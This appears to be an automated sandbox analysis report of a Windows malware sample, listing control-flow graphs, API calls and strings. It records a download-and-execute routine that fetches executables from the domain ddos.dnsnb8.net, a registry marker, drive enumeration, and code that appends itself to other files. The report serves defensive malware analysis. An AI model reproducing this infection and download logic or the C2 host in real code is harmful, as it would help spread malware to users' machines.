1171->1176 1172->950 1179 df1319 1172->1179 1173 df12b0 VirtualAlloc 1173->1176 1178 df12b8 1173->1178 1174 df12f1 CloseHandle 1174->1172 1175 df1302 VirtualFree 1174->1175 1175->1172 1176->1173 1176->1174 1177 df1296 VirtualFree 1176->1177 1176->1178 1177->1173 1178->1174 1180 df134a 1179->1180 1181 df132a GetModuleHandleA GetProcAddress 1179->1181 1182 df1351 memset 1180->1182 1183 df1363 1180->1183 1181->1180 1181->1183 1182->1183 1183->950 1183->958 1184->971 1186 df1196 1185->1186 1187 df10ba 1185->1187 1187->1186 1203 df185b GetSystemTimeAsFileTime srand rand srand rand 1187->1203 1189 df1118 wsprintfA wsprintfA URLDownloadToFileA 1190 df10dc 1189->1190 1191 df1168 lstrlen Sleep 1189->1191 1194 df1000 CreateFileA 1190->1194 1191->1187 1195 df1025 GetFileSize CreateFileMappingA MapViewOfFile 1194->1195 1196 df1092 WinExec lstrlen 1194->1196 1197 df107b 1195->1197 1198 df1057 1195->1198 1196->1186 1196->1187 1201 df108d CloseHandle 1197->1201 1202 df1087 CloseHandle 1197->1202 1199 df1074 UnmapViewOfFile 1198->1199 1200 df1061 1198->1200 1199->1197 1200->1199 1201->1196 1202->1201 1203->1189 1210 df2361 1211 df236b UnmapViewOfFile 1210->1211 1212 df2374 1210->1212 1211->1212 1213 df2379 CloseHandle 1212->1213 1214 df2382 1212->1214 1213->1214 1215 df2388 CloseHandle 1214->1215 1216 df2391 1214->1216 1215->1216

                            Callgraph

                            • Executed
                            • Not Executed
                            • Opacity -> Relevance
                            • Disassembly available
                            callgraph 0 Function_00DF235D 1 Function_00DF185B 2 Function_00DF17D0 3 Function_00DF274A 3->1 12 Function_00DF1973 3->12 4 Function_00DF2C48 4->12 36 Function_00DF2B8C 4->36 5 Function_00DF66C8 40 Function_00DF6A84 5->40 41 Function_00DF6B02 5->41 46 Function_00DF6D00 5->46 6 Function_00DF2845 6->3 24 Function_00DF239D 6->24 32 Function_00DF2692 6->32 7 Function_00DF2B7D 18 Function_00DF29E2 7->18 8 Function_00DF1AF9 47 Function_00DF1638 8->47 9 Function_00DF6CF8 10 Function_00DF6076 10->5 11 Function_00DF1DF6 12->1 13 Function_00DF6CF2 13->9 14 Function_00DF2CF0 15 Function_00DF1E6E 15->1 15->8 15->11 16 Function_00DF1C68 15->16 21 Function_00DF2D60 15->21 26 Function_00DF2D9B 15->26 30 Function_00DF1915 15->30 37 Function_00DF1D8A 15->37 38 Function_00DF1B8A 15->38 43 Function_00DF1C81 15->43 17 Function_00DF6B63 49 Function_00DF6834 17->49 51 Function_00DF69B0 17->51 53 Function_00DF67A4 17->53 48 Function_00DF28B8 18->48 19 Function_00DF14E1 19->8 19->47 20 Function_00DF2361 20->26 22 Function_00DF119F 23 Function_00DF139F 23->22 28 Function_00DF1319 23->28 35 Function_00DF120E 23->35 24->18 25 Function_00DF189D 24->25 24->30 27 Function_00DF1099 27->1 45 Function_00DF1000 27->45 29 Function_00DF1718 29->14 31 Function_00DF6014 33 Function_00DF6012 34 Function_00DF680F 36->6 36->7 38->1 39 Function_00DF600A 40->13 40->34 41->17 42 Function_00DF6001 42->39 44 Function_00DF1581 44->1 45->2 46->13 46->17 46->51 47->2 47->4 47->23 47->27 47->29 47->44 48->15 48->18 48->24 48->32 50 Function_00DF6734 50->40 50->41 50->46 52 Function_00DF65A6

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1539311409.0000000000DF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00DF0000, based on PE: true
                            • Associated: 00000002.00000002.1539292358.0000000000DF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539334035.0000000000DF3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539352310.0000000000DF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539370451.0000000000DF6000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_df0000_oHOvZLBf.jbxd
                            Similarity
                            • API ID: memset$Find$Filelstrcmpilstrlen$CloseFirstNextlstrcpynstrrchrwsprintf
                            • String ID: %s*$C:\$Documents and Settings
                            • API String ID: 2826467728-110786608
                            • Opcode ID: 41f3919f97bbbf3e1bfbea5f38fd95cf534fade2cd891cf6b5cef98bdebb63e2
                            • Instruction ID: 1a0b46f25f00774a09e44d64489c428f9f2cf3aca54179699092c7434329ad39
                            • Opcode Fuzzy Hash: 41f3919f97bbbf3e1bfbea5f38fd95cf534fade2cd891cf6b5cef98bdebb63e2
                            • Instruction Fuzzy Hash: F84142B2404349AFD721DFA0DC49DFB77ACEB84315F06882AFA44D2111EA34D648CBB6

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 172 df1099-df10b4 173 df10ba-df10c7 172->173 174 df1199-df119c 172->174 175 df10c8-df10d4 173->175 176 df10da 175->176 177 df1184-df1190 175->177 179 df1113-df1162 call df185b wsprintfA * 2 URLDownloadToFileA 176->179 177->175 178 df1196-df1198 177->178 178->174 182 df10dc-df110d call df1000 WinExec lstrlen 179->182 183 df1168-df1182 lstrlen Sleep 179->183 182->178 182->179 183->177 183->179
                            APIs
                              • Part of subcall function 00DF185B: GetSystemTimeAsFileTime.KERNEL32(00DF1F92,00000000,?,00000000,?,?,?,00DF1F92,?,00000000,00000002), ref: 00DF1867
                              • Part of subcall function 00DF185B: srand.MSVCRT ref: 00DF1878
                              • Part of subcall function 00DF185B: rand.MSVCRT ref: 00DF1880
                              • Part of subcall function 00DF185B: srand.MSVCRT ref: 00DF1890
                              • Part of subcall function 00DF185B: rand.MSVCRT ref: 00DF1894
                            • WinExec.KERNEL32(?,00000005), ref: 00DF10F1
                            • lstrlen.KERNEL32(00DF4748), ref: 00DF10FA
                            • wsprintfA.USER32 ref: 00DF112A
                            • wsprintfA.USER32 ref: 00DF1143
                            • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 00DF115B
                            • lstrlen.KERNEL32(ddos.dnsnb8.net,00000000,?,?,00000000,00000000), ref: 00DF1169
                            • Sleep.KERNEL32 ref: 00DF1179
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1539311409.0000000000DF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00DF0000, based on PE: true
                            • Associated: 00000002.00000002.1539292358.0000000000DF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539334035.0000000000DF3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539352310.0000000000DF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539370451.0000000000DF6000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_df0000_oHOvZLBf.jbxd
                            Similarity
                            • API ID: FileTimelstrlenrandsrandwsprintf$DownloadExecSleepSystem
                            • String ID: %s%.8X.exe$C:\Users\user~1\AppData\Local\Temp\$cj/$ddos.dnsnb8.net$http://%s:%d/%s/%s
                            • API String ID: 1280626985-4120842960
                            • Opcode ID: 9d31dbe166e3f8763fd0fad482d4bb9a2accf8addbdc12505070d4cb28b4f788
                            • Instruction ID: f9505ba1d06110c132d7207e696c82c1829a9b5ef3e68744f5982ee70cff0e22
                            • Opcode Fuzzy Hash: 9d31dbe166e3f8763fd0fad482d4bb9a2accf8addbdc12505070d4cb28b4f788
                            • Instruction Fuzzy Hash: AD210C7590034CFADB209BA0DC45ABBBBB9AB15315F16C056E605E2150DB759B84CF70

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 216 df1718-df1733 GetSystemTimeAsFileTime 217 df1735-df1752 SHSetValueA 216->217 218 df1754-df1758 216->218 219 df17c6-df17cd 217->219 218->219 220 df175a-df1784 SHGetValueA 218->220 220->219 221 df1786-df17b3 call df2cf0 * 2 220->221 221->219 226 df17b5 221->226 227 df17bf 226->227 228 df17b7-df17bd 226->228 227->219 228->219 228->227
                            APIs
                            • GetSystemTimeAsFileTime.KERNEL32(?,?,00000104,C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exe), ref: 00DF1729
                            • SHSetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,00000003,?,00000008), ref: 00DF174C
                            • SHGetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,?,?,00000001), ref: 00DF177C
                            • __aulldiv.LIBCMT ref: 00DF1796
                            • __aulldiv.LIBCMT ref: 00DF17A8
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1539311409.0000000000DF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00DF0000, based on PE: true
                            • Associated: 00000002.00000002.1539292358.0000000000DF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539334035.0000000000DF3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539352310.0000000000DF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539370451.0000000000DF6000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_df0000_oHOvZLBf.jbxd
                            Similarity
                            • API ID: TimeValue__aulldiv$FileSystem
                            • String ID: C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exe$SOFTWARE\GTplus$Time
                            • API String ID: 541852442-2532596453
                            • Opcode ID: c9fb3dd3cb1b6c34ddad45a6d97d4bf8aabbb948ae1a32910b08ddbd3b304604
                            • Instruction ID: 9b9cee47264d5a203b16666cd50d4e88cde87a9167cc15004ddd5c8657ae3259
                            • Opcode Fuzzy Hash: c9fb3dd3cb1b6c34ddad45a6d97d4bf8aabbb948ae1a32910b08ddbd3b304604
                            • Instruction Fuzzy Hash: 34112175A0030DFBDB11AAA4C885FBF7BBCEB44B14F12C115FB05A6140D6719A48CB70

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 229 df6076-df6079 230 df607b-df6080 229->230 231 df60e0-df60eb 229->231 233 df60f7-df60f8 230->233 234 df6082-df6085 230->234 232 df60ee-df60f4 231->232 236 df60f6 232->236 237 df60fe-df6106 233->237 238 df60fa-df60fc call df66c8 233->238 235 df6087 234->235 234->236 235->232 239 df6089-df6095 235->239 236->233 241 df6108-df611d 237->241 242 df6155-df6189 VirtualFree 237->242 238->237 243 df6097-df609f 239->243 244 df60a1-df60aa 239->244 246 df611f-df6121 241->246 251 df618c-df6192 242->251 243->244 249 df61ba-df61c8 244->249 250 df60b0-df60c1 VirtualAlloc 244->250 247 df6123 246->247 248 df6151-df6154 246->248 247->248 252 df6125-df6128 247->252 248->242 255 df61ca-df61d7 249->255 256 df6243-df6251 249->256 253 df60c7-df60cf 250->253 251->253 254 df6198-df61b0 VirtualFree 251->254 258 df612a-df612e 252->258 259 df6134-df613b 252->259 253->251 260 df60d5-df60df VirtualAlloc 253->260 254->249 263 df61b2-df61b4 254->263 257 df61dd-df61e0 255->257 261 df6264-df626f 256->261 262 df6253 256->262 257->256 265 df61e2-df61f2 257->265 258->259 272 df6130-df6132 258->272 259->272 273 df613d-df614f 259->273 260->231 264 df6271-df6276 261->264 268 df6255-df6258 262->268 263->249 269 df627c-df6289 264->269 270 df6389-df63b1 VirtualProtect 264->270 271 df61f5-df61fe 265->271 268->261 274 df625a-df6262 268->274 285 df628b 269->285 286 df6292-df6298 269->286 277 df63b7-df63ba 270->277 275 df620c-df6219 271->275 276 df6200-df6203 271->276 272->246 273->246 274->268 281 df6238-df623f 275->281 279 df621b-df6228 276->279 280 df6205-df6208 276->280 282 df63fc-df63ff VirtualProtect 277->282 283 df63bc-df63c2 277->283 279->281 287 df622a-df6236 280->287 288 df620a 280->288 281->271 290 df6241 281->290 284 df6400-df6416 282->284 283->283 289 df63c4 283->289 291 df6418-df641d 284->291 292 df6420-df6425 284->292 285->286 293 df62a2-df62ac 286->293 287->281 288->281 289->282 294 df63c6-df63cf 289->294 290->257 295 df62ae 293->295 296 df62b1-df62c8 293->296 297 df63d4-df63d8 294->297 298 df63d1 294->298 295->296 299 df62ce-df62d4 296->299 300 df6373-df6384 296->300 301 df63dd-df63e1 297->301 302 df63da 297->302 298->297 303 df62da-df62f1 299->303 304 df62d6-df62d9 299->304 300->264 305 df63e7-df63fa VirtualProtect 301->305 306 df63e3 301->306 302->301 308 df6365-df636e 303->308 309 df62f3-df62f9 303->309 304->303 305->277 305->282 306->305 308->293 310 df62fb-df630f 309->310 311 df6314-df6326 309->311 312 df6426-df64a9 310->312 313 df634c-df6360 311->313 314 df6328-df634a 311->314 322 df64ab-df64c0 312->322 323 df6519-df651c 312->323 313->312 314->308 329 df6535-df6537 322->329 330 df64c2 322->330 324 df651d-df651e 323->324 325 df6583-df6587 323->325 328 df6522-df6533 324->328 327 df6588-df658b 325->327 331 df658d-df658f 327->331 332 df65a1-df65a3 327->332 328->329 333 df659a 329->333 334 df6539 329->334 335 df64f8 330->335 336 df64c5-df64cd 330->336 337 df6591-df6593 331->337 340 df659b-df659d 333->340 338 df653b-df6541 334->338 339 df65b4 334->339 343 df656c-df656f 335->343 344 df64fa-df64fe 335->344 341 df64cf-df64d4 336->341 342 df6542-df6545 336->342 337->340 345 df6595 337->345 338->342 350 df65be-df65db 339->350 340->337 346 df659f 340->346 347 df6517-df6518 341->347 348 df64d6-df64d9 341->348 349 df654d-df6550 342->349 351 df6572 343->351 344->351 352 df6500 344->352 345->333 346->327 347->323 348->349 353 df64db-df64f5 348->353 349->350 354 df6552-df6556 349->354 360 df65dd-df65f6 350->360 356 df6573-df6576 351->356 352->328 357 df6502 352->357 353->335 358 df6578-df657a 354->358 359 df6558-df6569 354->359 356->358 357->356 361 df6504-df6513 357->361 358->360 363 df657c 358->363 359->343 362 df65f7-df6608 360->362 361->329 364 df6515 361->364 363->362 365 df657e-df657f 363->365 364->347 365->325
                            APIs
                            • VirtualAlloc.KERNEL32(00000000,00001800,00001000,00000004), ref: 00DF60BE
                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 00DF60DF
                            • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00DF6189
                            • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00DF61A5
                            Memory Dump Source
                            • Source File: 00000002.00000002.1539370451.0000000000DF6000.00000040.00000001.01000000.00000004.sdmp, Offset: 00DF0000, based on PE: true
                            • Associated: 00000002.00000002.1539292358.0000000000DF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539311409.0000000000DF1000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539334035.0000000000DF3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539352310.0000000000DF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_df0000_oHOvZLBf.jbxd
                            Similarity
                            • API ID: Virtual$AllocFree
                            • String ID:
                            • API String ID: 2087232378-0
                            • Opcode ID: d9a06ce9d0bbae6b3cd98f75b5cfb14e88b1875533c0d308f299a3c739a26dd6
                            • Instruction ID: 84e7f44f2537bf3bdf5cac10a82e43cbd38fb1a063dc686b303d09f7212917cb
                            • Opcode Fuzzy Hash: d9a06ce9d0bbae6b3cd98f75b5cfb14e88b1875533c0d308f299a3c739a26dd6
                            • Instruction Fuzzy Hash: 891246725087899FDB328F64CC45BFA3BB0EF02300F1A855DDA898BA92D774E900C765

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 366 df2b8c-df2bc6 memset GetLogicalDriveStringsA 367 df2c09-df2c28 WaitForMultipleObjects 366->367 368 df2bc8-df2bcc 366->368 369 df2c3c-df2c45 367->369 370 df2c2a-df2c3a CreateThread 367->370 371 df2bce-df2bd0 368->371 372 df2bfa-df2c07 lstrlen 368->372 370->369 371->372 373 df2bd2-df2bdc GetDriveTypeA 371->373 372->367 372->368 373->372 374 df2bde-df2be1 373->374 374->372 375 df2be3-df2bf6 CreateThread 374->375 375->372
                            APIs
                            • memset.MSVCRT ref: 00DF2BA6
                            • GetLogicalDriveStringsA.KERNEL32(00000050,?), ref: 00DF2BB4
                            • GetDriveTypeA.KERNEL32(?), ref: 00DF2BD3
                            • CreateThread.KERNEL32(00000000,00000000,Function_00002B7D,?,00000000,00000000), ref: 00DF2BEE
                            • lstrlen.KERNEL32(?), ref: 00DF2BFB
                            • WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 00DF2C16
                            • CreateThread.KERNEL32(00000000,00000000,00DF2845,00000000,00000000,00000000), ref: 00DF2C3A
                            Memory Dump Source
                            • Source File: 00000002.00000002.1539311409.0000000000DF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00DF0000, based on PE: true
                            • Associated: 00000002.00000002.1539292358.0000000000DF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539334035.0000000000DF3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539352310.0000000000DF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539370451.0000000000DF6000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_df0000_oHOvZLBf.jbxd
                            Similarity
                            • API ID: CreateDriveThread$LogicalMultipleObjectsStringsTypeWaitlstrlenmemset
                            • String ID:
                            • API String ID: 1073171358-0
                            • Opcode ID: 87893c12f8142fa42c7d62a329afc21f1e8d150ad3d6e1b9a297319632783631
                            • Instruction ID: 4e693cd5ea8b4bfc19b26d964d7d68986bab37216ec90211763b67ee055d3330
                            • Opcode Fuzzy Hash: 87893c12f8142fa42c7d62a329afc21f1e8d150ad3d6e1b9a297319632783631
                            • Instruction Fuzzy Hash: 6B21A5B184029CAFE7209F64AC84DBF7B6DFB05345B1A8126FE52D2261D7248E06CB71

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 16 df1e6e-df1e95 call df2d60 19 df1e9c-df1eaa call df1df6 16->19 20 df1e97 call df1d8a 16->20 24 df2332 19->24 25 df1eb0-df1ed9 SetFileAttributesA CreateFileA 19->25 20->19 26 df2338-df233b 24->26 25->24 27 df1edf-df1f28 call df1915 SetFilePointer CreateFileMappingA MapViewOfFile 25->27 28 df233d-df2340 UnmapViewOfFile 26->28 29 df2346-df2349 26->29 27->24 34 df1f2e-df1f39 27->34 28->29 32 df234b-df234e FindCloseChangeNotification 29->32 33 df2350-df2354 29->33 32->33 35 df2356-df235b FindCloseChangeNotification 33->35 36 df2391-df239a call df2d9b 33->36 34->24 37 df1f3f-df1f56 34->37 35->36 37->24 39 df1f5c-df1f64 37->39 39->24 41 df1f6a-df1f70 39->41 41->24 42 df1f76-df1f87 call df1c81 41->42 42->24 45 df1f8d-df1fa7 call df185b call df1c81 42->45 45->24 50 df1fad-df1fb4 45->50 51 df1fb6-df1fc5 call df1af9 50->51 52 df2024-df2045 50->52 51->52 58 df1fc7-df1fd2 51->58 52->24 53 df204b-df204e 52->53 56 df2070-df20f4 call df1af9 * 2 call df1c68 * 2 memset * 2 53->56 57 df2050-df2053 53->57 78 df20f5-df20fe 56->78 60 df2056-df205a 57->60 58->24 61 df1fd8-df1fe7 58->61 60->56 63 df205c-df2061 60->63 64 df1fef-df2006 call df1af9 61->64 65 df1fe9-df1fec 61->65 63->24 67 df2067-df206e 63->67 73 df2008-df200e call df1c68 64->73 74 df2013-df201e FlushViewOfFile 64->74 65->64 67->60 73->74 74->52 79 df2130-df2139 78->79 80 df2100-df2114 78->80 83 df213c-df2142 79->83 81 df212d-df212e 80->81 82 df2116-df212a 80->82 81->78 82->81 84 df215c 83->84 85 df2144-df2150 83->85 88 df215f-df2162 84->88 86 df2157-df215a 85->86 87 df2152-df2154 85->87 86->83 87->86 89 df2164-df2171 88->89 90 df2181-df2184 88->90 91 df232a-df232d 89->91 92 df2177-df217e 89->92 93 df218d-df21ba call df1c68 90->93 94 df2186 90->94 91->88 92->90 97 df21bc-df21d0 call df1c68 93->97 98 df21d3-df220b call df1c81 call df1c68 93->98 94->93 97->98 105 df220d-df2218 call df1c68 98->105 106 df221b-df221e 98->106 105->106 108 df2226-df231a memcpy UnmapViewOfFile CloseHandle call df1b8a call df185b SetFilePointer SetEndOfFile SetFilePointer WriteFile * 2 call df1915 106->108 109 df2220-df2223 106->109 116 df231f-df2328 CloseHandle 108->116 109->108 116->26
                            APIs
                            • SetFileAttributesA.KERNEL32(?,00000080,?,00DF32B0,00000164,00DF2986,?), ref: 00DF1EB9
                            • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00DF1ECD
                            • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002,00000000,00000000), ref: 00DF1EF3
                            • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 00DF1F07
                            • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000400), ref: 00DF1F1D
                            • FlushViewOfFile.KERNEL32(?,00000400,?,00000000,00000000,?,00000000,00000002), ref: 00DF201E
                            • memset.MSVCRT ref: 00DF20D8
                            • memset.MSVCRT ref: 00DF20EA
                            • memcpy.MSVCRT ref: 00DF222D
                            • UnmapViewOfFile.KERNEL32(?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00DF2238
                            • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00DF224A
                            • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00DF22C6
                            • SetEndOfFile.KERNEL32(000000FF,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00DF22CB
                            • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00DF22DD
                            • WriteFile.KERNEL32(000000FF,00DF4008,00000271,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00DF22F7
                            • WriteFile.KERNEL32(000000FF,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00DF230D
                            • CloseHandle.KERNEL32(000000FF,000000FF,00000001,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00DF2322
                            • UnmapViewOfFile.KERNEL32(?,?,00DF32B0,00000164,00DF2986,?), ref: 00DF2340
                            • FindCloseChangeNotification.KERNEL32(?,?,00DF32B0,00000164,00DF2986,?), ref: 00DF234E
                            • FindCloseChangeNotification.KERNEL32(000000FF,?,00DF32B0,00000164,00DF2986,?), ref: 00DF2359
                            Memory Dump Source
                            • Source File: 00000002.00000002.1539311409.0000000000DF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00DF0000, based on PE: true
                            • Associated: 00000002.00000002.1539292358.0000000000DF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539334035.0000000000DF3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539352310.0000000000DF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539370451.0000000000DF6000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_df0000_oHOvZLBf.jbxd
                            Similarity
                            • API ID: File$CloseView$Pointer$ChangeCreateFindHandleNotificationUnmapWritememset$AttributesFlushMappingmemcpy
                            • String ID:
                            • API String ID: 3349749541-0
                            • Opcode ID: 63e316a84e4613c205ad114615d348b29e4ba80a0fa32c098c2993c9489fa815
                            • Instruction ID: 62262850e467ad292a814a870c8f2aacac297cea61d827f8c25e526cfab2978a
                            • Opcode Fuzzy Hash: 63e316a84e4613c205ad114615d348b29e4ba80a0fa32c098c2993c9489fa815
                            • Instruction Fuzzy Hash: 69F12975900209EFCB24DFA4DC85ABDBBB5FF08314F11852AE619A7661D730AE81CF64

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 117 df1973-df199a PathFileExistsA 118 df1ac7-df1acc 117->118 119 df19a0-df19aa 117->119 121 df1ace 118->121 122 df1ad0-df1ad5 118->122 120 df19af-df19c2 CreateFileA 119->120 125 df1a28-df1a36 GetFileSize 120->125 126 df19c4-df19d3 Sleep 120->126 121->122 123 df1ad7-df1ad9 122->123 124 df1af0-df1af6 122->124 123->124 128 df1a38-df1a3b 125->128 129 df1a87-df1a8b 125->129 126->120 127 df19d5-df1a0b call df185b wsprintfA CopyFileA 126->127 127->125 143 df1a0d-df1a26 CreateFileA 127->143 128->129 130 df1a3d-df1a51 VirtualAlloc 128->130 131 df1a8d-df1a90 FindCloseChangeNotification 129->131 132 df1a96-df1a9a 129->132 130->129 134 df1a53-df1a57 130->134 131->132 135 df1aad-df1ab1 132->135 136 df1a9c 132->136 138 df1a59-df1a6d ReadFile 134->138 139 df1a80 134->139 141 df1adb-df1ae0 135->141 142 df1ab3-df1ab6 135->142 140 df1aa0-df1aa7 DeleteFileA 136->140 138->129 144 df1a6f-df1a7e 138->144 139->129 140->135 145 df1ae7-df1aec 141->145 146 df1ae2-df1ae5 141->146 142->118 147 df1ab8-df1ac1 VirtualFree 142->147 143->125 148 df1a9e 143->148 144->138 144->139 145->124 149 df1aee 145->149 146->145 147->118 148->140 149->124
                            APIs
                            • PathFileExistsA.SHLWAPI(00DF4E5C,00000000,C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exe), ref: 00DF1992
                            • CreateFileA.KERNEL32(00DF4E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00DF19BA
                            • Sleep.KERNEL32(00000064), ref: 00DF19C6
                            • wsprintfA.USER32 ref: 00DF19EC
                            • CopyFileA.KERNEL32(00DF4E5C,?,00000000), ref: 00DF1A00
                            • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DF1A1E
                            • GetFileSize.KERNEL32(00DF4E5C,00000000), ref: 00DF1A2C
                            • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00DF1A46
                            • ReadFile.KERNEL32(00DF4E5C,00DF4E60,00000000,?,00000000), ref: 00DF1A65
                            • FindCloseChangeNotification.KERNEL32(000000FF), ref: 00DF1A90
                            • DeleteFileA.KERNEL32(?), ref: 00DF1AA7
                            • VirtualFree.KERNEL32(00DF4E60,00000000,00008000), ref: 00DF1AC1
                            Strings
                            • 2, xrefs: 00DF19CF
                            • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00DF19DB
                            • %s%.8X.data, xrefs: 00DF19E6
                            • C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exe, xrefs: 00DF197C
                            Memory Dump Source
                            • Source File: 00000002.00000002.1539311409.0000000000DF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00DF0000, based on PE: true
                            • Associated: 00000002.00000002.1539292358.0000000000DF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539334035.0000000000DF3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539352310.0000000000DF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539370451.0000000000DF6000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_df0000_oHOvZLBf.jbxd
                            Similarity
                            • API ID: File$CreateVirtual$AllocChangeCloseCopyDeleteExistsFindFreeNotificationPathReadSizeSleepwsprintf
                            • String ID: %s%.8X.data$2$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exe
                            • API String ID: 2523042076-1974942556
                            • Opcode ID: 3d22d4901e96d1e3fb9591d9b044c5ac4d63d8b9896b11dca3c5954bd5340c7c
                            • Instruction ID: c27856d28f58fc4670ca1d92ba992b41c526423562176930d191b1e5227343fa
                            • Opcode Fuzzy Hash: 3d22d4901e96d1e3fb9591d9b044c5ac4d63d8b9896b11dca3c5954bd5340c7c
                            • Instruction Fuzzy Hash: D7516C7590121DEFCB209F98CC84ABEBBB8EB04354F16856AF615E6290C7309E55CBB0

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 150 df28b8-df28ff memset wsprintfA 151 df29db-df29df 150->151 152 df2905-df290d 150->152 152->151 153 df2913-df2919 152->153 154 df291b-df294c memset wsprintfA call df29e2 153->154 155 df2956-df2965 strrchr 153->155 160 df2951 154->160 155->151 157 df2967-df2978 lstrcmpiA 155->157 158 df297a-df2981 call df1e6e 157->158 159 df2988-df2992 lstrcmpiA 157->159 163 df2986 158->163 159->151 162 df2994-df299b 159->162 160->151 164 df29ad-df29c9 strstr 162->164 165 df299d-df29a3 162->165 163->151 167 df29cb-df29d1 call df239d 164->167 168 df29d3-df29d6 call df2692 164->168 165->164 166 df29a5-df29a7 lstrcpy 165->166 166->164 167->151 168->151
                            APIs
                            • memset.MSVCRT ref: 00DF28D3
                            • wsprintfA.USER32 ref: 00DF28F7
                            • memset.MSVCRT ref: 00DF2925
                            • wsprintfA.USER32 ref: 00DF2940
                              • Part of subcall function 00DF29E2: memset.MSVCRT ref: 00DF2A02
                              • Part of subcall function 00DF29E2: wsprintfA.USER32 ref: 00DF2A1A
                              • Part of subcall function 00DF29E2: memset.MSVCRT ref: 00DF2A44
                              • Part of subcall function 00DF29E2: lstrlen.KERNEL32(?), ref: 00DF2A54
